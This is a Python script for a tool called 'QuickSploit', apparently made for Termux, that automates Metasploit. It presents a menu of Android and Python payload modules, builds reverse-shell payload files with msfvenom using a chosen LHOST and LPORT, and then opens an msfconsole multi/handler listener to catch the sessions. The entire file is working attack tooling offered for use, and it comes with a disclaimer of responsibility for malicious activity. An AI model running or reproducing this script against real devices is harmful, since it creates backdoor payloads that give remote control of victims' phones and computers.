#!/usr/bin/python3
from subprocess import call
from re import search
from re import ASCII
from os import getcwd as pwd
from threading import Thread
from Banner import *
from random import choice
from time import sleep
from os import chdir
import os

def Checking_packge():
    os.system("clear")
    os.system("bash setup.sh")
Checking_packge()

def _quicksploit_banner_():

    print("""{R}========================(R5C)==========================
╔═══╗╔╗─╔╗╔══╗╔═══╗╔╗╔═╗ ╔═══╗╔═══╗╔╗───╔═══╗╔══╗╔════╗
║╔═╗║║║─║║╚╣─╝║╔═╗║║║║╔╝ ║╔═╗║║╔═╗║║║───║╔═╗║╚╣─╝║╔╗╔╗║
║║─║║║║─║║─║║─║║─╚╝║╚╝╝  ║╚══╗║╚═╝║║║───║║─║║─║║─╚╝║║╚╝
║╚═╝║║║─║║─║║─║║─╔╗║╔╗║  ╚══╗║║╔══╝║║─╔╗║║─║║─║║───║║──
╚══╗║║╚═╝║╔╣─╗║╚═╝║║║║╚╗ ║╚═╝║║║───║╚═╝║║╚═╝║╔╣─╗──║║──
───╚╝╚═══╝╚══╝╚═══╝╚╝╚═╝ ╚═══╝╚╝───╚═══╝╚═══╝╚══╝──╚╝──{N}
[ {S}Python3{N} ] [ {S}Metsploit Automation{N} ]           ({Y}v0.0.1{N})

{R}Note{N}: I'm not responsible for your melicious activity.""".format(N=col(),R=col("R"),Y=col("Y"),S=col("S")))


def col(t="N"):
    """
    Configaring Colors

    """

    if t == "N":
        return "\u001b[0m"
    if t == "G":
        return "\u001b[32;1m"
    if t == "R":
        return "\u001b[31;1m"
    if t == "B":
        return "\u001b[34m"
    if t == "Y":
        return "\u001b[33;1m"
    if t == "P":
        return "\u001b[35;1m"
    if t == "S":
        return "\u001b[36;1m"
    if t == "DG":
        return "\u001b[32m"
    if t == "C":
        return "\u001b[2m"


def print_console(host,port,pay):
    """
    Formated Print Table

    """

    def odd(n):
        if int(n)%2==0:
            return 0
        else:
            return 0
    _len1_ = len(host)-3
    _len2_ = len(port)-3
    _len3_ = len(pay)-5
    _lm1_ = "-"*(_len1_)
    _lm2_ = "-"*(_len2_)
    _lm3_ = "-"*(_len3_)
    _ls1_ = " "*(int((_len1_+2)/2)-1)
    _ls2_ = " "*(_len2_)
    _ls3_ = " "*(_len3_)

    print("""{G}+{L1}----------{L2}-------{L3}---+
|{LS1}{R}LHOST{G}{LS1}| {R}LPORT{G}{LS2}| {R}{:^{LS3}}{G} |
+{L1}-----+----{L2}--+----{L3}---+
| {N}{:{lh}}{G} | {N}{:^{lp}}{G} | {N}{:^{lP}}{G} |
+{L1}---------{L2}--------{L3}---+\u001b[0m""".format("PAYLOAD",host,port,pay,L1=_lm1_,L2=_lm2_,L3=_lm3_,LS1=_ls1_,LS2=_ls2_,LS3=len(pay),lh=_len1_,lp=_len2_+4,lP=_len3_,R=col("R"),N=col(),G=col("G")))
    print("[ {P}Exploit{N} ]: exploit/multi/handler".format(P=col("P"),N=col()))



def console(payload,host="127.0.0.1",port="4444"):
    """
    Console Session

    """
    print_console(host,port,payload)
    sleep(7)
    print("[ "+col("Y")+"Preparing for listerning"+col()+" ]"+col("C"))
    call(["msfconsole","-q","-x","use exploit/multi/handler;set lhost "+host+";set lport "+port+";set payload "+payload+";exploit;"])

def Payload(payload,name,host,port):
    """
    Payload sessions

    """
    sleep(0.3)
    P=col("P")
    N=col()
    cd=pwd()
    try:
        chdir('/data/data/com.termux/files/home')
    except:
        pass
    if payload[:5] == "andro":
        if name[-3:]!= ".apk":
            name=name+".apk"
        print("{N}[ {P}Apk file{N} ]: ".format(P=P,N=N)+pwd()+"/"+name)

    if payload[:5] == "pytho":
        if name[-3:]!= ".py":
            name=name+".py"
        print("{N}[ {P}Python file{N} ]: ".format(P=P,N=N)+pwd()+"/"+name)

    print("{N}[{G}*{N}] Generating payload.".format(G=col("G"),N=col()))
    os.system("msfvenom -p "+payload+" lhost="+host+" lport="+port+" r"+">"+name)
    print("{N}[ {Y}Payload{N} ] Created sucessfully.".format(Y=col("Y"),N=col()))
    chdir(cd)



def banner1():

    """
    Print Initial  banner

    """
    print("""
 {G}---------------------- Option ------------------------{N}
 {R}  1 {G}- {N}[ Android ]     --   {C}[ Android payloads ]{N}
 {R}  2 {G}- {N}[ Modules ]     --   {C}[ All payload modules ]{N}
 {R}  3 {G}- {N}[ Python  ]     --   {C}[ Python payloads ]{N}
 {R}  4 {G}- {N}[ Search  ]     --   {C}[ Search for modules ]{N}
 {R}  q {G}- {N}[ {R}Exit{N}    ]     --   {C}[ Altrenative:( Q ,5 ) ]{N}
 {G}------------------------------------------------------{N}
                            """.format(G=col("G"),R=col("R"),C=col("C"),N=col()))


"""
Configaring module.txt

"""


conf=open("module.txt","r")
List={}
count=0
for i in conf:
    List[count]=i.replace("\n","")
    count+=1
conf.close()


def Search(_word_,List=List):

    """
    Search module form the backuped list from module.txt

    """

    print()
    print("{S}    ------------------ {} -----------------".format(_word_,G=col("G"),S=col("S"))+col())
    for i in List:
        w=search(r"(.*?)"+_word_+"(.*).*",str(List[i]),ASCII)
        try:
            print("      "+col("R")+"{:>2}".format(str(i))+col("G")+" - "+col()+w.group())
        except:
            pass
    print(col("S")+"\n    -------------------------------------------"+col())



def banner2(n,List=List):

    """
    Print Next banner

    """

    if n == "1":
        Search("android")
        Load("android")
    elif n == "2":
        print(col("S")+"\n    ----------------- Modules -----------------"+col())
        for i in List:
            print("      "+col("R")+"{:>2}".format(str(i))+col("G")+" - "+col()+List[i])
        print(col("S")+"\n    -------------------------------------------"+col())
        Load("module")
    elif n == "3":
        Search("python")
        Load("python")
    elif n == "4":
        _search_=input(col("S")+"Search Word"+col()+": ")
        if _search_=="":
            print("[{R}!{N}] No Query given".format(R=col("R"),N=col()))
            banner2("4")
        else:
            Search(_search_)
            Load("search")
    elif n in ("5","q","Q"):
        raise SystemExit()
    else:
        index()


def Load(Name="",List=List):

    """
    Prompt curser for module
    Configaring Local host ...

    """

    _inp_=""
    print(" {R}      b {G}-{N} Back\n".format(R=col("R"),G=col("G"),N=col()))
    while _inp_=="":
        _inp_=input(col("DG")+"[QSP]["+Name+"] > "+col()).strip()
        if _inp_=="b":
            index()
            break
        if _inp_ =="q":
            raise SystemExit()
        if _inp_ != "":
            for i in List:
                if str(i) == _inp_:
                    host=input(col("R")+"LHOST ("+col()+"127.0.0.1"+col("R")+")"+col()+": ").strip()
                    port=input(col("R")+"LPORT   ("+col()+"4444"+col("R")+")   "+col()+": ").strip()
                    name=input(col("R")+"Name  ("+col()+"payload"+col("R")+")  "+col()+": ").strip()
                    confirm=input(col("C")+"[              ....Enter to Create....               ]"+col())
                    if name == "":
                        name="payload"
                    if port == "":
                        port="4444"
                    if host == "":
                        host="127.0.0.1"
                    T1=Thread(target=Payload,args=(List[i],name,host,port))
                    T1.start()
                    console(List[i],host,port)
                    print(col("C"))
                    os.system("killall postgres 2>/dev/null")
                    print("\n\n"+col())
                    raise SystemExit()
                    break
            _inp_=""


def index():

    """
    Call to print Initial banner

    """

    call(["clear"])
    B=choice(Blist)
    print(B)
    _quicksploit_banner_()
    banner1()
    _inp_=input(col("DG")+"[QSP] > "+col()).strip()
    if _inp_!="":
        banner2(_inp_)
    else:
        index()

try:
                                                #Exception
    call(["clear"])
    index()
except:
    raise SystemExit()
